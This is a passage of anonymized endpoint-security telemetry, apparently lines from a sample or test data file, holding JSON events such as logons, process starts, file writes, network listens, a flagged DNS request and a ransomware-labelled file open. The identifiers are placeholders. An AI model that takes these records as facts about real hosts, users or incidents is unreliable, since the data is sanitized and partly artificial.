b","aip":"208.216.144.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PeFileWritten","id":"ffffffff-1111-11eb-b091-06f6cca0a049","name":"PeFileWrittenV14","timestamp":"1604855121109"}
-{"AuthenticationId":"317005428","AuthenticationPackage":"Negotiate","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3950066843","EffectiveTransmissionClass":"2","Entitlements":"15","LogoffTime":"1604855132.756","LogonDomain":"dom1","LogonServer":"srv2","LogonTime":"1604855131.666","LogonType":"7","PasswordLastSet":"1598119332.510","RemoteAccount":"1","UserFlags":"32","UserIsAdmin":"0","UserLogoffType":"3","UserLogonFlags":"0","UserName":"user4","UserPrincipal":"user.name@dom2.com","UserSid":"S-1-5-21-606747145-1364589140-725345543-28636","aid":"ffffffffe0104823bd3de859d5bc8bc7","aip":"208.216.134.211","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogoff","id":"ffffffff-1111-11eb-8913-0287fd11c79b","name":"UserLogoffV3","timestamp":"1604855134461"}
-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"537307300","ContextProcessId":"635780922149","ContextThreadId":"9479299143023","ContextTimeStamp":"1604855025.966","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"0e02a8c7ed9d244887cef0409af0e6190030000000001100","FileObject":"18446695174291796544","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"83886176","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Program Files\\Snow Software\\Inventory\\Agent\\cloudmeteringhost.exe","aid":"ffffffff425942f58382dbb11350eeda","aip":"208.216.150.192","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableWritten","id":"ffffffff-1111-11eb-93cb-067deb43537b","name":"NewExecutableWrittenV1","timestamp":"1604855149643"}
-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"50714198593318","ContextThreadId":"194302491825207","ContextTimeStamp":"1604855150.066","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"59491","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffa51b4acf9dbc1fc273e6145c","aip":"208.222.216.124","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"NetworkListenIP4V5","timestamp":"1604855150545"}
-{"ClientComputerName":"com1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"7073822473144","ContextThreadId":"48689911139327","ContextTimeStamp":"1604855152.993","EffectiveTransmissionClass":"2","Entitlements":"15","EtwRawProcessId":"744","EtwRawThreadId":"5304","LogonDomain":"BROADCAST","LogonType":"3","RemoteAddressIP4":"208.80.28.100","Status":"3221225581","SubStatus":"3221225578","UserName":"user5","aid":"ffffffffd8844a59acce5e1f4ad01888","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed2","id":"ffffffff-1111-11eb-a8aa-067029dffccb","name":"UserLogonFailed2V2","timestamp":"1604855154274"}
-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextProcessId":"1838383212125","ContextThreadId":"27242382481217","ContextTimeStamp":"1604855151.534","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"b0754a8f86feffffb0754a8f86feffff09764a8f86feffff","FileObject":"18446636884348143072","IrpFlags":"1028","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Program Files\\WindowsApps\\Deleted\\Microsoft.Getstarted_9.10.32461.0_x64__8wekyb3d8bbweacf6b996-01b3-402c-bd01-a67529f94699\\clrcompression.dll","aid":"ffffffff4a0946365161093453e596d4","aip":"208.216.150.195","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ExecutableDeleted","id":"ffffffff-1111-11eb-b23b-064dea059649","name":"ExecutableDeletedV3","timestamp":"1604855154670"}
-{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009202.1","ConfigStateHash":"230795414","ContextProcessId":"318137549555284836","ContextThreadId":"0","ContextTimeStamp":"1604855135.209","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"20195","SHA256HashData":"295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"318137549555284836","aid":"ffffffffcfe84e8c6a52c4001bd83761","aip":"208.173.124.176","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-ae31-065d76bec0c3","name":"EndOfProcessMacV11","timestamp":"1604855160047"}
-{"ApiReturnValue":"1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"683078218537","ContextTimeStamp":"1604855171.731","EffectiveTransmissionClass":"3","Entitlements":"15","EtwRawProcessId":"19400","EtwRawThreadId":"9384","aid":"ffffffff80984ea8b49d9a53f590c566","aip":"208.24.76.36","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RegisterRawInputDevicesEtw","id":"ffffffff-1111-11eb-a570-0685ba2a382f","name":"RegisterRawInputDevicesEtwV1","timestamp":"1604855173077"}
-{"CompletionEventId":"Event_ChannelDataDownloadCompleteV1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","DownloadPath":"metahash+/cfs/channelfiles/0000000013/b2acba1a30a3407dae27d0503611022d/C-00000013-00000000-00000408.sys","DownloadPort":"443","DownloadServer":"lfodown01-b.cloudsink.net","EffectiveTransmissionClass":"0","Entitlements":"15","TargetFileName":"C-00000013-00000000-00000408.sys","aid":"ffffffffffc94c645268f64fc900213f","aip":"208.64.212.186","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"LFODownloadConfirmation","id":"ffffffff-1111-11eb-8ab5-0643392fc75d","name":"LFODownloadConfirmationV1","timestamp":"1604855174018"}
-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"2071361595421","ContextThreadId":"41650430047375","ContextTimeStamp":"1604855146.590","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","FileObject":"18446622606546437424","IrpFlags":"395312","MajorFunction":"6","MinorFunction":"0","NewFileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","OperationFlags":"0","SourceFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\temp\\EKA0UARWWK\\Microsoft.WSMan.Management.ni.dll","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.We0722664#\\c2579d00f9849413b8b7948dd00ac863\\Microsoft.WSMan.Management.ni.dll","aid":"ffffffff280b41b956a91e816bd9b9b0","aip":"208.105.150.175","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8162-0663305b686f","name":"NewExecutableRenamedV6","timestamp":"1604855177513"}
-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"402097454","ContextProcessId":"66601077523","ContextThreadId":"2500785639062","ContextTimeStamp":"1604855165.213","DesiredAccess":"1048577","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"d2f4250ff1ba3b4ca66e123c5269884ca6f8020000002700","FileObject":"18446641334185168032","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"35668001","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\CbsTemp\\30848497_1904507751\\FodWU","aid":"ffffffff2c9f4066b0b5f2f00265503c","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DirectoryCreate","id":"ffffffff-1111-11eb-9411-06b7c99be087","name":"DirectoryCreateV1","timestamp":"1604855180332"}
-{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wlidsvc","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextTimeStamp":"1604855196.468","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"949196415400","RpcClientThreadId":"44209361549673","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"wlidsvc","TargetProcessId":"955370934902","TokenType":"1","UserName":"user6","aid":"fffffffffcc4413057adc260e99b0774","aip":"208.9.106.189","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ServiceStarted","id":"ffffffff-1111-11eb-9c98-02c501fe7d81","name":"ServiceStartedV2","timestamp":"1604855196635"}
-{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"319255017313886870","ContextTimeStamp":"1604855200.751","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"0","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:1","RemotePort":"2181","aid":"ffffffffed0f41575620ab9fb25ce105","aip":"208.62.90.250","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-81f1-061cdebbd115","name":"NetworkConnectIP6MacV5","timestamp":"1604855200836"}
-{"AuthenticationId":"1656178821","AuthenticationPackage":"Kerberos","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"30254389526587","ContextThreadId":"275230771323179","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"dom1","LogonId":"1656178821","LogonServer":"srv1","LogonTime":"1604855211.249","LogonType":"5","PasswordLastSet":"1530626210.104","RemoteAccount":"1","SessionId":"0","UserCanonical":"","UserFlags":"32","UserIsAdmin":"0","UserLogonFlags":"0","UserName":"user7","UserPrincipal":"user7@dom4.cm","UserSid":"S-1-5-21-606747145-1364589140-725345543-183372","aid":"ffffffff73164cfa9656c4caff8a2a38","aip":"208.216.134.209","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-86e3-02db1faa1327","name":"UserIdentityV2","timestamp":"1604855212031"}
-{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\System32\\svchost.exe -k netsvcs -p -s 
NetSetupSvc","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"4193986770","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","ImageSubsystem":"2","IntegrityLevel":"16384","MD5HashData":"8a0a29438052faed8a2532da50455756","ParentAuthenticationId":"999","ParentProcessId":"2881931477041","ProcessCreateFlags":"525324","ProcessEndTime":"","ProcessParameterFlags":"8193","ProcessStartTime":"1604842733.215","ProcessSxsFlags":"64","RawProcessId":"6160","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6","SessionId":"0","SourceProcessId":"2881931477041","SourceThreadId":"70316664105336","Tags":"27, 29, 53, 54, 55, 185, 10445360464024, 10445360464025, 10445360464026, 10445360464258, 10445360464273, 10445360464274, 12094627905582, 12094627906234, 211655988347297","TargetProcessId":"2882232404222","TokenType":"2","UserSid":"S-1-5-18","WindowFlags":"128","aid":"ffffffffbe8a46386afe80c5ef64d0b5","aip":"208.65.31.23","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-b4f9-06e3a7e5503b","name":"ProcessRollup2V16","timestamp":"1604855237946"} 
-{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"1016182570608","ContextThreadId":"37343520154472","ContextTimeStamp":"1604829512.519","DesiredAccess":"1179785","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"7a9c1c1610045d45a54bd6643ac12ea767a5020000000c00","FileObject":"18446670458156489088","Information":"1","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"16777312","ShareAccess":"5","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user11\\Downloads\\file.pptx","aid":"ffffffffac4148947ed68497e89f3308","aip":"208.226.182.36","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RansomwareOpenFile","id":"ffffffff-1111-11eb-9756-06fe7f8f682f","name":"RansomwareOpenFileV4","timestamp":"1604855242091"}
-{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"13532","ConHostProcessId":"1731198143955","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"2030177841","ContextData":"","ContextProcessId":"1741732942772","ContextThreadId":"28523520529271","ContextTimeStamp":"1604855274.377","CycleTime":"473618996","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"0","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"0","GenericFileWrittenCount":"0","ImageSubsystem":"2","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"1406250","MaxThreadCount":"16","ModuleLoadCount":"72","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"1731198143955"
,"PrivilegedProcessHandleCount":"0","ProcessStartTime":"1604855154.465","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"18176","RegKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"1741732942772","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRemoteCount":"0","UserSid":"S-1-12-1-1647509123-1308660782-3901357462-3999411581","UserTime":"781250","aid":"fffffffffdab492a5a20cd0417395a73","aip":"208.216.134.192","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-b685-0241eaddc553","name":"EndOfProcessV14","timestamp":"1604855276657"} 
-{"AuthenticationId":"895027","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1786917081743","ContextThreadId":"31685015444484","ContextTimeStamp":"1604855317.892","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"0000000000000000be341bb58bc5f1f2a24339010200510e","FileObject":"18446636933702558240","IrpFlags":"1028","IsOnNetwork":"1","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"223989","TargetFileName":"\\Device\\Mup\\intranet.dev\\int\\Test.pptx","TokenType":"1","aid":"fffffffffa474d216472f3edb73c75ed","aip":"208.216.134.214","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"OoxmlFileWritten","id":"ffffffff-1111-11eb-9165-067ee18a7975","name":"OoxmlFileWrittenV11","timestamp":"1604855329571"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"439029805661","ContextThreadId":"273683743193497","ContextTimeStamp":"1604855351.158","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"a93:432:ffff:0:c830:b4bf:1e0:ffff","LocalPort":"50373","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffff1f924e228a807ea4c0f21b0b","aip":"208.222.208.124","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-85f5-02ab029194b9","name":"NetworkListenIP6V5","timestamp":"1604855351798"} 
-{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","ContextProcessId":"321365562189152025","ContextThreadId":"0","ContextTimeStamp":"1604846070.744","Entitlements":"15","SHA256HashData":"e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d","Size":"29646","TargetFileName":"/System/Library/CoreServices/SecurityAgentPlugins/HomeDirMechanism.bundle/Contents/MacOS/HomeDirMechanism/..namedfork/rsrc","VnodeModificationType":"10","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"208.69.144.69","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"AsepFileChange","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"AsepFileChangeMacV2","timestamp":"1604855355495"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"2932136","ContextThreadId":"36157339485804","ContextTimeStamp":"1604855191.803","EffectiveTransmissionClass":"2","Entitlements":"15","LogonTime":"","PasswordLastSet":"","UserLogonFlags":"1","UserName":"user7","UserSid":"S-1-5-10","aid":"ffffffffa5bd4efaa195a7132c576edc","aip":"208.216.128.255","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed","id":"ffffffff-1111-11eb-aa5a-0207e26418af","name":"UserLogonFailedV1","timestamp":"1604855193422"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1858880895","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"56042872298","ContextTimeStamp":"1604855136.669","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"2a02:ffff:11:8000:d140:da90:aa7a:62a5","LocalPort":"49689","Protocol":"6","RemoteAddressIP6":"2a00:ffff:11:809:0:0:0:200e","RemotePort":"443","aid":"ffffffff6854438eb4181691ec47e43d","aip":"208.68.193.187","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-a889-061944805289","name":"NetworkConnectIP6V5","timestamp":"1604855199798"} 
-{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"321382909294815631","ContextThreadId":"0","ContextTimeStamp":"1604853755.987","Entitlements":"15","SHA256HashData":"fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583","Size":"165","SourceFileName":"/Library/Application Support/JAMF/tmp/.dat.nosync2c98.VBwjsq","TargetFileName":"/Library/Application Support/JAMF/tmp/6B24D2B6-BC17-4470-8078-91A787A19478","aid":"ffffffffc07b49d6b7426e970523671a","aip":"208.213.180.70","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8773-06939a2f0915","name":"NewExecutableRenamedMacV1","timestamp":"1604855213224"} -{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321367236803434269","ContextTimeStamp":"1604855268.323","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"51076","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffffa60a47af4ebd2a76070f0d4f","aip":"208.131.50.212","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-9a50-0669ff09604d","name":"NetworkListenIP6MacV5","timestamp":"1604855268755"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ContextProcessId":"1611521722601","ContextThreadId":"53405065993811","ContextTimeStamp":"1604855280.307","DomainName":"raw.githubusercontent.com","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff6d724d38af99c628fb904626","aip":"208.216.134.211","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"SuspiciousDnsRequest","id":"ffffffff-1111-11eb-885e-02ac336efd4b","name":"SuspiciousDnsRequestV2","timestamp":"1604855323217"} 
-{"ConfigBuild":"100.3.0011603.1","ContextProcessId":"4492535979973","ContextThreadId":"14023068415125","ContextTimeStamp":"1604855315.034","DiskParentDeviceInstanceId":"PCI\\VEN_8086\u0026DEV_31E3\u0026SUBSYS_080C1028\u0026REV_03\\3\u002611583659\u00260\u002690","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeDeviceCharacteristics":"131072","VolumeDeviceObjectFlags":"134479872","VolumeDeviceType":"8","VolumeDriveLetter":"C:","VolumeFileSystemDevice":"\\Ntfs","VolumeFileSystemDriver":"\\FileSystem\\Ntfs","VolumeFileSystemType":"2","VolumeIsEncrypted":"0","VolumeMountPoint":"\\??\\Volume{9b46da3f-ce44-432f-9230-c9201504bfd7}","VolumeName":"\\Device\\HarddiskVolume4","VolumeRealDeviceName":"\\Device\\HarddiskVolume4","VolumeSectorSize":"512","aid":"ffffffff1990483499a736373600eef7","aip":"208.216.134.193","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeMounted","id":"ffffffff-1111-11eb-9be9-024459b713c5","name":"FsVolumeMountedV6","timestamp":"1604855329102"} -{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321210562584146513","ContextTimeStamp":"1604855127.011","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"53","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffe5ff467b4f0c4fd41a4462bb","aip":"208.71.20.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-ae74-065212970c5d","name":"NetworkListenIP4MacV5","timestamp":"1604855128936"} 
-{"AuthenticationId":"999","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855185.108","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\gpsvc.dll","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"219053851298","RpcClientThreadId":"22047924482692","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"gpsvc","TargetProcessId":"224116976578","TargetThreadId":"22920092479704","TokenType":"1","UserName":"user7","aid":"ffffffff59514ea68b4693ddfb9b6643","aip":"208.216.134.213","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStarted","id":"ffffffff-1111-11eb-860c-0606af112d55","name":"HostedServiceStartedV2","timestamp":"1604855184068"} -{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855299.018","EffectiveTransmissionClass":"3","Entitlements":"15","ServiceDisplayName":"wuauserv","TargetProcessId":"661455186053","TargetThreadId":"24238019995551","aid":"ffffffff2b5a4bf5afc6682595faa016","aip":"208.216.134.213","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStopped","id":"ffffffff-1111-11eb-9b11-0602a5689467","name":"HostedServiceStoppedV1","timestamp":"1604855302512"} 
-{"AuthenticationId":"3443175","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1091372257857","ContextThreadId":"36855848099771","ContextTimeStamp":"1604855227.625","DiskParentDeviceInstanceId":"PCI\\VEN_1179\u0026DEV_0113\u0026SUBSYS_00011179\u0026REV_01\\4\u00263ad42678\u00260\u002600E0","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"f5ce07c6af67ec4ebe0846ff200bfc2f54f7020000002100","FileObject":"18446603341701082336","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"288041","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user12\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\Downloads\\ex.pdf.8e41hf8.partial","TokenType":"1","aid":"ffffffff32cb4abc50bc133b31a69946","aip":"208.30.227.225","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PdfFileWritten","id":"ffffffff-1111-11eb-baea-02dccfbb7779","name":"PdfFileWrittenV11","timestamp":"1604855264313"} -{"AuthenticationId":"3783389","CommandLine":"\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" 
-ServerName:App.AppXnme9zjyebb2xnyygh6q9ev6p5d234br2.mca","ConfigBuild":"1007.3.0012309.1","ConfigStateHash":"3998263252","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\backgroundTaskHost.exe","ImageSubsystem":"2","IntegrityLevel":"4096","MD5HashData":"50d5fd1290d94d46acca0585311e74d5","ParentAuthenticationId":"3783389","ParentBaseFileName":"svchost.exe","ParentProcessId":"2439558094566","ProcessCreateFlags":"525332","ProcessEndTime":"","ProcessParameterFlags":"16385","ProcessStartTime":"1604855181.648","ProcessSxsFlags":"1600","RawProcessId":"22272","RpcClientProcessId":"2439558094566","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"b8e176fe76a1454a00c4af0f8bf8870650d9c33d3e333239a59445c5b35c9a37","SessionId":"1","SourceProcessId":"2439558094566","SourceThreadId":"77538684027214","Tags":"41, 12094627905582, 12094627906234","TargetProcessId":"2450046082233","TokenType":"2","UserSid":"S-1-12-1-3697283754-1083485977-2164330645-2516515886","WindowFlags":"128","aid":"ffffffff655344736aca58d17fb570f0","aip":"208.239.110.158","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-8462-02ade3b2f949","name":"ProcessRollup2V18","timestamp":"1604855182022"} -{"AuthenticationId":"326190744","AuthenticationUuid":"98467113-C771-4845-B71B-89B3CE9F93C9","AuthenticationUuidAsString":"13714698-71C7-4548-B71B-89B3CE9F93C9","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","Entitlements":"15","UID":"326190744","UserPrincipal":"user8@dom6","UserSid":"S-1-5-21-3629339319-2376021926-2724479216-652382488","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"208.69.144.69","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"UserIdentityMacV2","timestamp":"1604855355388"} -{"BootArgs":" NOEXECUTE=OPTIN 
HYPERVISORLAUNCHTYPE=AUTO FVEBOOT=2125824 NOVGA","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1874387338","EffectiveTransmissionClass":"0","Entitlements":"15","MachineDomain":"","aid":"ffffffffcdb543135e7fcdf8e5a8fbdb","aip":"208.6.139.160","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostInfo","id":"ffffffff-1111-11eb-9bbd-061290dcd983","name":"HostInfoV2","timestamp":"1604855157555"} -{"AuthenticationId":"703298","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2642284486","ContextProcessId":"1161025471861","ContextThreadId":"34929528116709","ContextTimeStamp":"1604851030.593","DiskParentDeviceInstanceId":"USB\\VID_1058\u0026PID_2621\\57583431453939315A4C5255","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"262fbc677256cf4c8d6c6a227285a072c06830873b000000","FileObject":"18446664963104449168","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"1","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"517029","TargetFileName":"\\Device\\HarddiskVolume5\\01.png.tmp$$","TokenType":"1","UserName":"user9","aid":"ffffffff16bf4c7bb5ad755a4722025c","aip":"208.216.134.196","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"GenericFileWritten","id":"ffffffff-1111-11eb-800